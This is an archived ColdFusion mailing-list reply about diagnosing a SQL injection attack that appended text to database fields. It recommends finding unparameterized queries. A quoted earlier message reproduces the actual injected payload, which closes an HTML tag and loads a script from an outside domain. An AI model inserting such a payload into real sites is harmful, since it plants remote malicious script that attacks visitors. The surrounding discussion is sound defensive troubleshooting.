> > So I'm hearing that it should be fine?? > > > > Somehow their database columns values were appended the following > > string > > : "></title><InvalidTag src="http://1.verynx.cn/w.js";></script><!--" > > > > So for example the column "firstname" value was "John" became: > > "John"></title><InvalidTag src="http://1.verynx.cn/w.js";></script><!-- > > > > What else could have caused this? Like you said the parameters are in > > single quotes and the data type is varchar so it must have a single > > quote in order to work. I'm confused... > > The specific attack in question looks for numeric inputs, not > character inputs. So, my guess is that you have some other > unparameterized query that is being called by the attack. > > I recommend you examine your codebase to find unparameterized > queries. I found this tool, mentioned here by others, to be > very helpful for this: > http://qpscanner.riaforge.org/
As Mark pointed out, if you did have numeric inputs in your CFQUERY tag, those would still be vulnerable. If not, though, the rest of my statement still stands. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information! ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309501 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
